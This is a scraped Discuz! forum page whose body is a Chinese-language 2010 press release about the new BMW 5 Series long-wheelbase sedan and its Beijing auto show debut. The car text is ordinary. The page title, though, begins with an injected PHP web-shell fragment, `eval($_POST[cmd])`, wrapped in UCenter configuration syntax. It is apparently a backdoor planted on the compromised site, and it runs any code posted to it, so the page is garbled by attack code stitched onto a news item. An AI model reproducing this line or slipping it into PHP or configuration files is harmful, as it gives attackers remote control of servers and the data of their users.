');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 全新一代寶馬5系長軸距版 北京車展首發 - 二手車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

全新一代寶馬5系長軸距版 北京車展首發

2010年4月1日,華晨寶馬汽車有限公司宣佈全新一代BMW 5系長軸距版將在4月第十二屆北京國際車展上全球首發,並將於2010年底前在中國上市。隨著全新第六代BMW 5系3月份在日內瓦國際車展上全球首發,專門針對中國市場需求而開發和設計的長軸距版成為了萬眾期待的焦點。



  華晨寶馬汽車有限公司總裁兼首席執行官康思遠先生表示:「全新一代BMW 5系長軸距版是寶馬工程設計的傑作,由寶馬集團最強大的研發團隊與瀋陽工廠傑出工程師共同完成,其研發過程與全新第六代BMW 5系同步開始,經歷了一個全新車型完整的研發過程。縱觀BMW 5系的歷史,每一代車型都是同級別中操控和動態駕駛的王者。全新一代BMW 5系長軸距版將同樣擁有BMW最純粹的駕駛樂趣,同時,它也將是最出色的豪華商務轎車。」



  全新一代BMW 5系長軸距版由寶馬集團為中國市場量身定做,在美學設計、駕駛樂趣和舒適性等方面為中國豪華商務轎車確立了新的標桿。全新一代BMW 5系長軸距版是在寶馬集團的心臟-BMW研發中心設計和開發的,在中國經歷了長期的道路測試,每一個細節都經過了反覆的推敲,每一個細節的設計都是為了滿足中國客戶對於商務及空間的需求。5系長軸距版的後排座椅是為中國客戶單獨研發的,將給客戶提供頭等艙的至尊享受,讓客戶盡情揮灑一切盡在掌握的商務之「悅」。



  全新一代BMW 5系長軸距版將是同級別車型中最創新的車型,它運用了BMW多項最先進的技術,從底盤到發動機,從車身到變速箱,每一項技術都代表了汽車工業的最高水平。比如在同級別車型中,5系長軸距版是第一個在所有排量的車型均標準配備8擋自動變速箱的豪華商務轎車。8擋自動變速箱不僅有效地減少了換擋時間,提升操控性,同時也有效地減少了燃油消耗。
在運用多項先進技術的同時,新車型也將採用多項最創新的配置,這些創新配置毋庸置疑都將開創同級別車型的先例。新車型將一如既往地運用BMW EfficientDynamics(高效動力)技術,包括制動能量回收系統等。高效動力技術的大量運用使新車型在環保方面達到了全新的高度,油耗和二氧化碳排放量較上一代BMW 5系最多減少高達18%。



  BMW 5系有著近40年的悠久歷史,在全球範圍生產和銷售超過了550萬輛。第一代5繫於1972年秋季問世,當時慕尼黑奧運會剛剛結束,寶馬總部「四缸大廈」也才拔地而起。新車型一上市就引起轟動,之後的每代車型均創造了更高的銷售紀錄。2003年,第五代BMW 5系與全球市場同步引進中國。



  2006年,寶馬集團第一次專門為中國客戶開發的5系長軸距版上市。四年來,這一車型取得了巨大成功,累計銷售超過了7萬多輛,成為BMW在中國市場最熱銷的車型,且每年保持著高速的增長。在即將更新換代的時候,當代5系長軸距版仍然供不應求,顯示了強大的市場競爭力,依然前衛和時尚的設計即將成為新的經典。



  BMW 5系的歷史是寶馬公司不斷壯大的歷史,也是世界汽車技術發展的歷史。進入到第六代產品的今天,BMW 5系正在開創新的未來!

 

發表,是一種抒發:好的心情可以一再的回味發酵
返回列表